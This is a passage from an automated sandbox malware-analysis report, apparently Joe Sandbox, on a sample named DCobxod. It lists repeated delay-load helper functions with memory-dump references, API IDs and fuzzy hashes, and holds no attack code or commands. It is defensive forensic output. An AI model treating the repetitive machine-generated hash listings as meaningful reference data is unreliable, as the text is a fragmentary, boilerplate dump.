                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: B
                                                              • API String ID: 1269201914-87422902
                                                              • Opcode ID: b04da35afb5d281c9638f7a24d67984dcf8fbe39a86a6419a0d8bda9541c188f
                                                              • Instruction ID: 23769ddc0407c2f72c1c94464039272449875cfdb506866fbf35e5fd4dc15fb5
                                                              • Opcode Fuzzy Hash: b04da35afb5d281c9638f7a24d67984dcf8fbe39a86a6419a0d8bda9541c188f
                                                              • Instruction Fuzzy Hash: E3B012E135A160FC318463073C02D3B031DC0C1B123B0C13FF849C1480E85CAC45143E
                                                              Function 0042E264 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0042E1E3
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: B
                                                              • API String ID: 1269201914-87422902
                                                              • Opcode ID: eb02533fb34d986e7ba35f049c66f84213d8756200806856c78558f9f900b666
                                                              • Instruction ID: 2ce17b702441dd554e7456133883c174f3ef2282632841d4352c6395b3982b28
                                                              • Opcode Fuzzy Hash: eb02533fb34d986e7ba35f049c66f84213d8756200806856c78558f9f900b666
                                                              • Instruction Fuzzy Hash: 1FB012D136A060FC314462073C02D3B035DC4C1B123B0C03FF84AC1080E85CAC01143F
                                                              Function 0042E26E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0042E1E3
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: B
                                                              • API String ID: 1269201914-87422902
                                                              • Opcode ID: f74dd259c0d2a369e09a195eec046805144348547b8f3ce61f3573913e2c7e9b
                                                              • Instruction ID: 4b426127a501adc54b3df342f95a45a4db1559f361febc96494ae6488fcfb43c
                                                              • Opcode Fuzzy Hash: f74dd259c0d2a369e09a195eec046805144348547b8f3ce61f3573913e2c7e9b
                                                              • Instruction Fuzzy Hash: 4DB012D1359020FC3144A2173D02D3B025CC0C2B123B0C03FFC49C1080E95CEC01143E
                                                              Function 0042E200 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0042E1E3
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: B
                                                              • API String ID: 1269201914-87422902
                                                              • Opcode ID: 99fc3630486a3915586b84211c16ff2cfaf630c4098d247d1824067be27e1a89
                                                              • Instruction ID: 3b25173885cbcdaf79f688f225f3c733366bbe8014c4184b0cbe367a54ab1590
                                                              • Opcode Fuzzy Hash: 99fc3630486a3915586b84211c16ff2cfaf630c4098d247d1824067be27e1a89
                                                              • Instruction Fuzzy Hash: D7B012D1359160FC318463073C02D3B021CC0C1B123B0C13FF809C1580E85CAC45143E
                                                              Function 0042E20A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0042E1E3
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: B
                                                              • API String ID: 1269201914-87422902
                                                              • Opcode ID: 97295faf58c592c40feecb56a95985d0f529074c7634815065ca0688efcf22da
                                                              • Instruction ID: bd951a75d9b7be60a49806b9d121f9fc457c43256d0722d714ba40ab8379f65b
                                                              • Opcode Fuzzy Hash: 97295faf58c592c40feecb56a95985d0f529074c7634815065ca0688efcf22da
                                                              • Instruction Fuzzy Hash: 63B09291359020AC314462072902D3A021CC081B123B0C03FF809C1180A868A90A143A
                                                              Function 0042E21E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0042E1E3
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: B
                                                              • API String ID: 1269201914-87422902
                                                              • Opcode ID: ada01eae8d25892bbb905d372144896e0db72a2a3d310579a5c6c9bf93d9b41e
                                                              • Instruction ID: f76c49b916e2dac76b43226539c5220c1e89580f41b83e141731e07996d0e62d
                                                              • Opcode Fuzzy Hash: ada01eae8d25892bbb905d372144896e0db72a2a3d310579a5c6c9bf93d9b41e
                                                              • Instruction Fuzzy Hash: E7B092A1359020BC314466072802D3A021CC082B123B0C03FF849C1080A858A901147A
                                                              Function 0042E228 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0042E1E3
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: B
                                                              • API String ID: 1269201914-87422902
                                                              • Opcode ID: b832d2b7aabd871880c55e680ccc1490df3fbd53550862ce55a3fb96464d656a
                                                              • Instruction ID: e25104b190b9a4eb9218918a03fb90490849ab6ce65e045fe1d6e0bef32c822b
                                                              • Opcode Fuzzy Hash: b832d2b7aabd871880c55e680ccc1490df3fbd53550862ce55a3fb96464d656a
                                                              • Instruction Fuzzy Hash: 3CB012E1359120FC318466073C02D3B021CC0C1F123B0C13FF809C1480E85CAD41147E
                                                              Function 0042E232 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0042E1E3
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: B
                                                              • API String ID: 1269201914-87422902
                                                              • Opcode ID: 5804627855b1c0af2f659d0f9d9c676e061f6eb4b2867fa8d93abb83a4b8c5ad
                                                              • Instruction ID: c1f9a6e848b47e765c19884404567ccd490b149f70902c67bd072c3b409ae0f3
                                                              • Opcode Fuzzy Hash: 5804627855b1c0af2f659d0f9d9c676e061f6eb4b2867fa8d93abb83a4b8c5ad
                                                              • Instruction Fuzzy Hash: D2B092A1359020AC314466072902D3A021CC081B123B0803FF809C1080E858AA02147A
                                                              Function 0042E23C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0042E1E3
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: B
                                                              • API String ID: 1269201914-87422902
                                                              • Opcode ID: 8376c4e5b6be7a0cfd87927b076fcfa180c47dfb59dcf9b3ef68836a0732c810
                                                              • Instruction ID: f916b1b4f01e2c9c93a78a76979c8150a424ecd177a7eea96013a65c3a210eff
                                                              • Opcode Fuzzy Hash: 8376c4e5b6be7a0cfd87927b076fcfa180c47dfb59dcf9b3ef68836a0732c810
                                                              • Instruction Fuzzy Hash: 83B092A1359020AC314466072802D3A021CC081B123B0803FF809C1080A858A901147A
                                                              Function 0042EAE7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0042EAF9
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: 3Qo
                                                              • API String ID: 1269201914-1944013411
                                                              • Opcode ID: fd2cbfd22eca2602c07f3f092daec7a58d249f819fdb383165f24a07e68c24ea
                                                              • Instruction ID: 0b0edf82f96f6fb517a0fffc4bd8d8686a80e3dc2f0863d504179a810104d562
                                                              • Opcode Fuzzy Hash: fd2cbfd22eca2602c07f3f092daec7a58d249f819fdb383165f24a07e68c24ea
                                                              • Instruction Fuzzy Hash: 64B0928639A0A27C310462022D42C360208C081B91371C02FF40485081A8890802143A
                                                              Function 0042E282 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0042E1E3
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: B
                                                              • API String ID: 1269201914-87422902
                                                              • Opcode ID: 84ac2d7fbd59a611757eb9c44964137f9b1f71276ecbc7a66fbbc318e2117e8a
                                                              • Instruction ID: e80df497dca9e2ab61cbf15a2bf722f0cdea2c66dc02e12148a902ec6bb31f1a
                                                              • Opcode Fuzzy Hash: 84ac2d7fbd59a611757eb9c44964137f9b1f71276ecbc7a66fbbc318e2117e8a
                                                              • Instruction Fuzzy Hash: CCB012E1359030FC3144A2073E02D3B029CC0C1B123B0C03FF809C1080EC5CAD02143E
                                                              Function 0042E546 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0042E51F
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: PDGu<B
                                                              • API String ID: 1269201914-247006151
                                                              • Opcode ID: 72e3b436dac9d92857c0ad986ed9f9560d4772292c17c40a057cf8f8758e2e09
                                                              • Instruction ID: e812674da1c833be4b61c1d580a2abefcaf4fe049090e71be675402b0092df8d
                                                              • Opcode Fuzzy Hash: 72e3b436dac9d92857c0ad986ed9f9560d4772292c17c40a057cf8f8758e2e09
                                                              • Instruction Fuzzy Hash: 0EB012C13691507C3244614B7C03D3B010CC0C2F193B1C22FF408C6080F84C0C85143E
                                                              Function 0042E50D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0042E51F
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: PDGu<B
                                                              • API String ID: 1269201914-247006151
                                                              • Opcode ID: 0de4a16090c4a2f4325d7032e9a11e8799bae77e40166ede34ba3282501c28d2
                                                              • Instruction ID: 51c8dfaa2657a90bd7edf143928f5f1fcbfc242f0e5d993f01b61e7a7dd8d189
                                                              • Opcode Fuzzy Hash: 0de4a16090c4a2f4325d7032e9a11e8799bae77e40166ede34ba3282501c28d2
                                                              • Instruction Fuzzy Hash: 65B012C13690507C310421673C06D3B010CD0C2F1D3B1C03FF454C5481B84C0D45143F
                                                              Function 0042E25F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0042E1E3
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: B
                                                              • API String ID: 1269201914-87422902
                                                              • Opcode ID: d0b3d2752d3b0a1ac9d08aaa2cd04f2b7a88451309b74e87dd62143770d3e5f2
                                                              • Instruction ID: 3cefce12053b1643b05ec24ac4740dcefe0a593441f6cc55c6360b2ff0f2884e
                                                              • Opcode Fuzzy Hash: d0b3d2752d3b0a1ac9d08aaa2cd04f2b7a88451309b74e87dd62143770d3e5f2
                                                              • Instruction Fuzzy Hash: 62A011E23AA022FC300822033C02C3B022CC0C2BA23B0883FF802C0080A8A8A802083A
                                                              Function 0042E27D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0042E1E3
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: B
                                                              • API String ID: 1269201914-87422902
                                                              • Opcode ID: 1521268a710010fdb1e2a0a5ae184c0b5d483cb5423ff1ce0f6dbc4e3f474315
                                                              • Instruction ID: 3cefce12053b1643b05ec24ac4740dcefe0a593441f6cc55c6360b2ff0f2884e
                                                              • Opcode Fuzzy Hash: 1521268a710010fdb1e2a0a5ae184c0b5d483cb5423ff1ce0f6dbc4e3f474315
                                                              • Instruction Fuzzy Hash: 62A011E23AA022FC300822033C02C3B022CC0C2BA23B0883FF802C0080A8A8A802083A
                                                              Function 0042E219 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0042E1E3
                                                                • Part of subcall function 0042E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0042E8D0
                                                                • Part of subcall function 0042E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0042E8E1
                                                              Strings
                                                              Memory Dump Source
